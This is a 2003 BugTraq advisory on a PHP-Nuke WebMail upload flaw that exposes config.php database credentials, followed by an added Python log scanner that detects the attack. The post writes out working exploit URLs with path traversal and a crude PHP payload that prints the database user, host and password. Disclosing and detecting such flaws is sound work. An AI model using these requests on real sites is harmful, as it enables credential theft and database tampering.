BugTraq
PHP-Nuke: config.php revealed with PHP uploaded file (affects all upload implementations in PHP-Nuke). SECURING PHP-NUKE.
Mar 01 2003 12:39PM
Lorenzo Hernandez Garcia-Hierro (webmaster lorenzohgh com)
Hello again friends,
While testing on my sites (www.novappc.com), I discovered that the PHP-Nuke code
injection that writes the content of config.php to a file involves more
than one vulnerability. I explain it here:
PROBLEM:
The WebMail module is an unsafe mail system, though not the whole package, only
the small file called mailattach.php. The first vulnerability
discovered is this:
http://NUKESITE/modules/WebMail/mailattach.php?%20userfile=../../config.php&userfile_name=../attachments/file.txt&attachments=1
(It lets the attacker write all the content of config.php,
passwords and users, to a file file.txt)
THE NEW VULNERABILITY:
I discovered it while testing the old one.
CODE:
http://NUKESITE/modules/WebMail/mailattach.php?%20userfile=[DIR TO PHP FILE]&userfile_name=../attachments/h4ckz.php&attachments=1
DESCRIPTION:
[DIR TO PHP FILE]:
This is the directory of your PHP file, which prints the contents of the
variables in config.php. The code of the file is:
<?php
include ("../../config.php");
echo 'DB User:',"$dbuname";
echo '<br><br>';
echo 'Host for Fuck:',"$dbhost";
echo '<br><br>';
echo 'Password:',"$dbpass";
echo '<br><br>';
echo 'Thats all folks my little fucker';
?>
This file loads the variables from config.php into the h4ckz.php file and prints
the contents of the variables using PHP's echo function.
You only need to access the temporary file on the server, in the directory
that you put in the &userfile_name of the exploit URL.
WHAT CAN HAPPEN?
All the passwords in config.php are disclosed. The attacker can use them
to modify, rename or DELETE the database, depending on the privileges and
the situation of the web admin tool, like phpnuke, and the access
configuration of the database (accepting TCP/IP connections or not).
DOES IT ONLY AFFECT WEBMAIL?
No, all the modules that upload files can be unsafe, because you can
modify the variables of the exploit URL to run against another module that
uploads files.
SOLUTION (SECURING PHP-NUKE):
FIRST: Modify the code of all the files that handle uploads so that they die
when the file is called remotely (remote QUERY_STRING and remote
REFERER); you can find more info about this in the modules.php file.
SECOND: Make sure (optional) that PHP-Nuke does not use a root user for the
database.
THIRD: Modify the mysql/postgre/etc. config to accept connections only from
localhost, and web admin apps like php admin (on remote servers)
can't run against your server ;-)
FOURTH: Activate only the modules that you use, Xd.
CONTACT:
EMAIL: admin (at) novappc (dot) com
WEBSITE: novappc.com novappc.mine.nu
NAME: LORENZO MANUEL HERNANDEZ GARCIA-HIERRO
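
ADDED EXAMPLE (not part of the original post): a log check for the request shape described above, where the upload variables userfile and userfile_name arrive in the query string of a GET request. The log lines, IP addresses and the /tmp/sample.php path are constructed for illustration; the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Upload variable names taken from the URLs in the post.
UPLOAD_VARS = {"userfile", "userfile_name"}
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
PHP_EXT_RE = re.compile(r"\.(php\d?|phtml)$", re.IGNORECASE)

# Constructed sample lines (documentation IP ranges, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Mar/2003:12:00:01 +0000] "GET /modules/WebMail/mailattach.php'
    '?%20userfile=../../config.php&userfile_name=../attachments/file.txt'
    '&attachments=1 HTTP/1.0" 200 512',
    '192.0.2.10 - - [01/Mar/2003:12:00:09 +0000] "GET /modules/WebMail/mailattach.php'
    '?%20userfile=/tmp/sample.php&userfile_name=../attachments/h4ckz.php'
    '&attachments=1 HTTP/1.0" 200 512',
    '203.0.113.7 - - [01/Mar/2003:12:01:30 +0000] "GET /modules.php?name=WebMail'
    ' HTTP/1.0" 200 8841',
]

def inspect_line(line):
    """Return the reasons a logged request looks like upload-variable injection."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    reasons = []
    query = urlsplit(match.group("target")).query
    for name, value in parse_qsl(query, keep_blank_values=True):
        name = name.strip().lower()  # the post's URLs send "%20userfile"
        if name not in UPLOAD_VARS:
            continue
        # A real upload arrives in a multipart POST body, never in the URL.
        reasons.append(f"{name} supplied in query string")
        if ".." in value.replace("\\", "/").split("/"):
            reasons.append(f"{name} contains path traversal")
        if name == "userfile_name" and PHP_EXT_RE.search(value):
            reasons.append("userfile_name ends in a PHP-executable extension")
    return reasons

def scan(lines):
    """Map line index -> reasons, for flagged lines only."""
    hits = {i: inspect_line(line) for i, line in enumerate(lines)}
    return {i: r for i, r in hits.items() if r}

if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_LOG).items():
        print(index, "; ".join(reasons))
```

Any hit on the first reason alone is worth reviewing, since these names should only ever be populated by the server's own upload handling.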